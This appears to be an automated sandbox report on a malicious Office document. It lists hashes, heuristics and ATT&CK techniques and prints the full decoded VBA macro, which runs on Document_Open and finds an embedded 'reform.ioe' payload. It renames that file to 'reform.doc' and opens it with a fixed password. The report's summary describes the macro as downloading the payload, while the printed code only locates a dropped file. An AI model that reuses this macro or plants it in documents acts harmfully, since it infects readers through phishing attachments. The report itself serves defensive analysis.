Office (OLE) malware analysis — malicious · 19da6e4981aac9a2

MALICIOUS

Office (OLE)

596.0 KB Created: 2021-09-14 11:46:00 First seen: 2021-09-23

MD5: 7cbc4c74870212cf418af8417001c23b SHA-1: d60621a16a639740bd9129a87eefc8f12f0f5c2b SHA-256: 19da6e4981aac9a2144b1f170a579c6408aaf4c069f99d1ede2c2f1df9eafcbb

72 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is triggered by the Document_Open event. This macro appears to be designed to download and save a second-stage payload named 'reform.doc' using the password '2281337'. The macro's functionality is partially truncated, but its intent to download and execute further malicious content is clear. The presence of the Document_Open macro and the embedded VBA code strongly suggests a spearphishing attachment attack vector.

Heuristics 5

Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT

OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/2006/encryption In document text (OLE body)
- http://schemas.microsoft.com/office/2006/keyEncryptor/passwordIn document text (OLE body)
- http://schemas.microsoft.com/office/2006/keyEncryptor/certificateIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2923 bytes
SHA-256: `767ea77c562515bd47e0818da03cc09698729322d771c7ac6f59d9951442af52`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Option Compare Text Dim hdv As String Dim bbbb As String Dim med As String Private Sub Document_Open() Dim dfgdgdg Dim kytrewwf As String kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath) If Dir(kytrewwf & "\" & "reform.doc") = "" Then Call bvxfcsd If Len(hdv) > 2 Then Call nam(hdv, kytrewwf) Call pppx(kytrewwf & "\" & "reform.doc") Word.Documents.Close End If End If End Sub Sub hdhdd(asda As String) Dim MyFSO As FileSystemObject Dim MyFile As File Dim SourceFolder As String Dim DestinationFolder As String Dim MyFolder As Folder Dim MySubFolder As Folder Set MyFSO = New Scripting.FileSystemObject Call Search(MyFSO.GetFolder(asda), hdv) End Sub Attribute VB_Name = "Module1" Sub pppx(spoc As String) Documents.Open FileName:=spoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="2281337", _ PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _ WritePasswordTemplate:="", Format:=wdOpenFormatAuto, XMLTransform:="" End Sub Sub ousx(aaaa As String) Call uoia(aaaa) End Sub Attribute VB_Name = "Module3" Sub bvxfcsd() Selection.MoveDown Unit:=wdLine, Count:=3 Selection.MoveRight Unit:=wdCharacter, Count:=2 Selection.MoveDown Unit:=wdLine, Count:=3 Selection.MoveRight Unit:=wdCharacter, Count:=2 Selection.TypeBackspace Selection.Copy Dim uuuuc uuuuc = Options.DefaultFilePath(wdUserTemplatesPath) ntgs = 50 sda = 49 Dim fafaa As String fafaa = "L" & "o" fafaa = fafaa & "c" & "a" & "l" fafaa = fafaa & "/" fafaa = fafaa & "T" & "e" & "mp" Dim kuls As String kuls = fafaa While sda < 50 ntgs = ntgs - 1 If Dir(Left(uuuuc, ntgs) & kuls, vbDirectory) = "" Then Else sda = 61 End If Wend Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & fafaa) End Sub Attribute VB_Name = "Module123345" Dim pls As String Sub Search(mds As Object, pafs As String) Dim Nedc As Object Dim Ters As Object Dim fffff fffff = "reform.ioe" For Each Nedc In mds.SubFolders Search Nedc, pafs Next Nedc For Each Ters In mds.Files If Ters.Name = fffff Then pafs = Ters End If Next Ters Exit Sub ErrHandle: Err.Clear End Sub Sub nam(pafs As String, aaaa As String) Call ousx(aaaa) Dim oxl oxl = "\reform" & ".doc" Name pafs As pls & oxl End Sub Sub uoia(fffs As String) pls = fffs End Sub
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: ObjectPool/_1693099757/Ole10Native	423745 bytes
SHA-256: `dcaa7b5233dccbb59bd9e7eaab72eb3f360c83270b67799729bf90a41f764e36`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact entropy is 7.99, consistent with packed or encrypted content.
`ole10native_00_reform.ioe`	ole-package-payload	OLE Ole10Native payload: ObjectPool/_1693099757/Ole10Native; display_name=reform.ioe; full_path=C:\Users\MyPc\AppData\Local\Temp\reform.ioe; temp_path=; def_file=	423424 bytes
SHA-256: `949661da346e7ed607d0fda1e7c7d5a6a944ea62f6fcecd8418f9912a1b095cf`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact entropy is 7.99, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.